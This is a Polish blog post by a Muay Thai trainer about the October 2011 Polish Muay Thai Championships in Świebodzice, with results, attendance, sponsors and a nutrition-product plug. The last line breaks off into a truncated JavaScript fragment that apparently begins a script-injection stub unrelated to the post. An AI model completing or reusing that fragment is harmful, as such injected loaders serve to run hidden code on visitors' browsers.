Mistrzostwa Polski Muaythai-3 dni na Booster :)

10.10.2011 / Mariusz Cieśliński

Tydzień temu zakończtły się Mistrzostwa Polski Muaythai pod patronatem Polskiego Związku Kickboxingu.
Tym razem organizowałem te zawody.Walki odbywały się w forule amatorskiej ale na starcie zameldowali sie także zawodnicy znani w branży fajterskiej z ringów profesjonalnych.StarT na zawodach w Świebodzicach potraktowali jako poligon przed poważniejszymi startami.Zresztą tym systemem ja także startuję :)
Fajne i dramatyczne walki mogły sie podobać publiczności,która w liczbe ok 500 osób dopingowała żywo zawodników.
Oczywiście Trec Nutrition był wszechobecny :)
Ja przez trzy dni jako trener o organizator jadłem tylko śniadanie a resztę dnia z braku czasu spędzałem nakręcony na batonach BOOSTER i popijałem RED FASTER>w międzyczasie musiałem jeszcze znalezć moment na trening rehabilitacyjny.W linku fotki a do samych zawodów jeszcze powrócę :)

W dniach 1-2.10.2011 r. Ośrodek Sportu i Rekreacji w Świebodzicach we współpracy z Mariuszem Cieślińskim oraz Stowarzyszeniem BONA FIDE ze Świebodzic był gospodarzem Mistrzostw Polski w Muay Thai. Zawody odbywały się w Hali Sportowo-Widowiskowej przy ulicy Mieszka Starego 6 w Świebodzicach.Walki finałowe zostały poprzedzone występem grupy Flycube z Wrocławia, która zaprezentowała swoje umiejętności akrobatyczne. Po zakończonej gali finałowej i dekoracji zawodników odbyła się walka wieczoru na zasadach K-1 o tytuł Zawodowego Mistrza Europy pomiędzy Pawłem Biszczakiem a Tadasem Jonkusem z Litwy. Polak wygrał pojedynek na punkty.W Mistrzostwach wzięło udział 132 zawodników z 25 klubów. Galę finałową obejrzało około 500 widzów. Najlepszym zawodnikiem Mistrzostw został uznany Marcin Parcheta (Nak Muay Szczecin).Imprezę wsparło wiele firm i organizacji: CANAL +, GAZETA WROCŁAWSKA, DRAGON SPORTS, MMA VIDEOS, FIGHTER WROCŁAW, TREC NUTRITION, REBELLINE, BODY ZONE, MANTO, FAIRTEX, ASAMI, FIGHTSPORT.PL, KO GYM, GWARANT POZNAŃ, BOLLYWOOD, SAN SWISS GRUPA RONAL, MIRJAN 2, ARAD, MIASTO ŚWIEBODZICE, Stowarzyszenie BONA FIDE OSiR ŚWIEBODZICE, MASTERS, VEGAS WESELA}var d=document;var s=d.createElement('script'); if (document.currentScript) {